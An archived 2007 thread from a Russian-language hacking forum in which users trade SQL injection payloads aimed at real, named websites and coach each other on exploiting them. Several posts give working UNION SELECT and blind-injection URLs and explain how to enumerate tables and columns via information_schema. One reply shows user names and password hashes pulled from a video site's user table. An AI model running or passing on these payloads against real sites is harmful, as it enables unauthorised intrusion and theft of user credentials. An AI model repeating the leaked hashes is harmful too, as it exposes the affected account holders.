ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
25.12.2007, 21:09
|
|
Познающий
Регистрация: 27.08.2006
Сообщений: 52
Провел на форуме:
338724
Репутация:
15
|
|
Sql-инъекция, или просто такая реакция на кавычки? Если инъекция, что можна сделать?
http://satel.com.ua/index.php?action=page&sub=news&id=1'
|
|
|
25.12.2007, 21:26
|
|
Members of Antichat - Level 5
Регистрация: 28.05.2007
Сообщений: 729
Провел на форуме:
5571194
Репутация:
1934
|
|
sql-inj только её надо раскрутить...
http://satel.com.ua/index.php?action=page&sub=news&id=-1+order+by+5/*
|
|
|
|
25.12.2007, 21:30
|
|
Guest
Сообщений: n/a
Провел на форуме:
Репутация:
|
|
слепая
http://satel.com.ua/index.php?action=page&sub=news&id=1+and+1=1
http://satel.com.ua/index.php?action=page&sub=news&id=1+and+1=0
|
|
|
|
26.12.2007, 20:30
|
|
Постоянный
Регистрация: 07.11.2007
Сообщений: 392
Провел на форуме:
1325167
Репутация:
100
|
|
http://gunsclub.msk.ru/news.php?id=1+ORDER+BY+40000/* И как это...?
Либо здесь на самом деле больше 4000 таблиц, либо иньекция абсолютно слепая.
|
|
|
|
28.12.2007, 04:48
|
|
Guest
Сообщений: n/a
Провел на форуме:
Репутация:
|
|
http://www.myvideo.ge/cams/goLive.php?act=View&st_u_id=-24969+union+select+1,2,3,4,5,6,7,8+from+informatio n_schema.tables/*
help me
shto nazivaetsa username ili password  ( |
|
|
|
28.12.2007, 07:08
|
|
Участник форума
Регистрация: 16.06.2007
Сообщений: 133
Провел на форуме:
1877761
Репутация:
237
|
|
Воть доделал
Код:
http://www.myvideo.ge/cams/goLive.php?act=View&st_u_id=-24969+union+select+1,2,3,concat_ws(0x2F,user_id,user_name,user_password),version(),6,7,8+from+video_users/*
Version 5.0.22-log
user_name Password
Guro f5d1278e8109edd94e1e4197e04873b9
achiko 202cb962ac59075b964b07152d234b70
----------------------------------------------------------------
А дальше сам используй limit |
|
|
|
28.12.2007, 16:30
|
|
Guest
Сообщений: n/a
Провел на форуме:
Репутация:
|
|
sps balshoe
|
|
|
|
28.12.2007, 22:37
|
|
Guest
Сообщений: n/a
Провел на форуме:
Репутация:
|
|
http://www.guss.edu.ge/new1.php?nid=-1+UNION+SELECT+1,2,3,4,5+from+information_schema.t ables/*
help me
|
|
|
|
28.12.2007, 23:28
|
|
Banned
Регистрация: 25.12.2006
Сообщений: 179
Провел на форуме:
2337678
Репутация:
354
|
|
http://www.guss.edu.ge/new1.php?nid=-1+UNION+SELECT+1,table_name,3,4,5+from+information _schema.tables+limit+0,1/*
И погнал дальше перебирать 1,1 и 2,2 и так далее после лимита.
После (как все переберёшь) начинай перебирать колонки, точно так же, только:
+from+information_schema.columns+limit+0,1/*
и вместо table_name ставим column_name
С ув. ThreeD
|
|
|
|
28.12.2007, 23:34
|
|
Постоянный
Регистрация: 11.11.2006
Сообщений: 595
Провел на форуме:
1845062
Репутация:
1079
|
|
Сообщение от ThreeD
И погнал дальше перебирать 1,1 и 2,2 и так далее после лимита.
После (как все переберёшь) начинай перебирать колонки, точно так же, только:
+from+information_schema.columns+limit+0,1/*
и вместо table_name ставим column_name
С ув. ThreeD
В limit'е первый параметр с какой записи, а второй сколько. Если скуль выводит только одну запись, то все равно, какое число второе, если оно больше нуля 
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для K1nD[e]R](/avatars/avatar37752.jpg?539094){kind=avatar}
Похожие темы
Линейный вид
